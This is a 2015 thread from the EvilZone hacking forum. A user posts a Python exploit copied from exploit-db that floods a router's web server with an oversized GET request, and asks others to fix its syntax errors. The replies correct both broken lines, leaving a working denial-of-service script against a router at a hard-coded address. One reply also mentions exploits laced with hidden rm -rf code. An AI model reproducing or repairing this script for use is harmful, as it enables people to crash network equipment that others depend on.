EvilZone
Community => General discussion => : FurqanHanif May 03, 2015, 09:39:53 PM
-
i am Trying To run This Exploit but i 'm getting Syntax error when i Run it, some one help me to fix this Code..
i am Getting syntax Error on line 14 ... :(
#!/bin/python
import socket
import struct
# This will crash the router.
# In some devices it takes about 10 minutes until functionality is restored.
buffer = "\x41" * 6000 # Original fuzzing buffer.
host = "192.168.15.25"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
payload = GET /" + buffer + " HTTP / 1.1 \r\n "
payload += ("Host: %s \r\n\r\n", % host)
s.send(payload)
s.close()
Original Post.
https://www.exploit-db.com/exploits/34102/
-
i am Trying To run This Exploit but i 'm getting Syntax error when i Run it, some one help me to fix this Code..
i am Getting syntax Error on line 14 ... :(
Original Post.
https://www.exploit-db.com/exploits/34102/ (https://www.exploit-db.com/exploits/34102/)
line 14 should be
payload = "GET /" + buffer + " HTTP / 1.1 \r\n "
instead of
payload = GET /" + buffer + " HTTP / 1.1 \r\n "
That shouldn't be that hard to see, since the GET-part is a string constant that has to be enclosed in quotes.
-
Now Error in Line 15... :(
File "buffer.py", line 15
payload += ("Host: %s \r\n\r\n", % host)
^
SyntaxError: invalid syntax
-
Remove the comma and the brackets and learn to code your own exploits, so you don't have to rely on others' shitty and obviously untested code.
-
Remove the comma and the brackets and learn to code your own exploits, so you don't have to rely on others' shitty and obviously untested code.
Some people like to leave intentional bugs and obvious logic flaws so that people like OP ask questions how to run it and get laughed at. More evil people embed obfuscated rm -rf code into some overflow exploits so that stupid people mindlessly running them would self-destruct :D